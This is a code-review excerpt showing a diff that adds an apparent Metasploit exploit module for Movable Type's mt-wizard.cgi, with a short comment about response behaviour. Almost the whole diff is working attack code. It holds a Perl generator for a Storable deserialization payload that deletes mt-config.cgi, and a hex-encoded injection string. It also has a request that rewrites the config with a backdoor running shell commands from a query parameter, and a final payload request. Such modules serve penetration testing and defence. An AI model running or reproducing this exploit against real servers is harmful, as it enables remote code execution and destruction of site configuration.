modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb

```diff
@@ -0,0 +1,272 @@
+        'vars_get' => {
+          '__mode' => 'retry',
+          'step'   => 'configure',
+          'config' => config_payload
+        }
+      })
+
+    if res && res.code == 200
+      print_status("Successfully sent exploit request")
+    else
+      fail_with(Failure::Unknown, "Error sending exploit request")
+    end
+  end
+
+=begin
+
+#!/usr/bin/perl
+
+# Generate destructive config parameter to unlink mt-config.cgi
+
+use Storable;
+
+{
+    package CGITempFile;
+}
+
+my $unlink_target = "mt-config.cgi";
+my $cgitempfile = bless \$unlink_target, "CGITempFile";
+
+my $data = [$cgitempfile];
+my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
+$frozen = unpack 'H*', $frozen;
+print "RCE unlink payload requiring CGI: $frozen\n";
+
+=end
+
+  def exploit_destructive
+    print_status("#{peer} - Using destructive attack method")
+    # First we need to delte mt-config.cgi using the storable injection
+
+    print_status("#{peer} - Sending storable injection to unlink mt-config.cgi")
+
+    res = send_request_cgi({
+        'method'    => 'GET',
+        'uri'       => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
+        'vars_get' => {
+          '__mode' => 'retry',
+          'step'   => 'configure',
+          'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'
+        }
+      })
+
+    if res && res.code == 200
+      print_status("Successfully sent unlink request")
+    else
+      fail_with(Failure::Unknown, "Error sending unlink request")
+    end
+
+    # Now we rewrite mt-config.cgi to accept a payload
+
+    print_status("#{peer} - Rewriting mt-config.cgi to accept the payload")
+
+    res = send_request_cgi({
+        'method'    => 'GET',
+        'uri'       => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
+        'vars_get'  => {
+          '__mode'             => 'next_step',
+          'step'               => 'optional',
+          'default_language'   => 'en_us',
+          'email_address_main' => "x\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\n\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1",
+          'set_static_uri_to'  => '/',
+          'config'             => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/',
+        }
+      })
+
+    if res && res.code == 200
+      print_status("Successfully sent mt-config rewrite request")
+    else
+      fail_with(Failure::Unknown, "Error sending mt-config rewrite request")
+    end
+
+    # Finally send the payload
+
+    print_status("#{peer} - Sending payload request")
+
+    res = send_request_cgi({
+        'method'    => 'GET',
+        'uri'       => normalize_uri(target_uri.path, 'mt.cgi'),
+        'vars_get'  => {
+          'xyzzy'   => payload.encoded,
+        }
+      })
```

Comment:
The way both the nondestructive and destructive attacks work shouldn't cause the webapp to hang in any way. It should return immediately with either a 500 response or a 200 response. I haven't observed any hanging behavior in testing this module.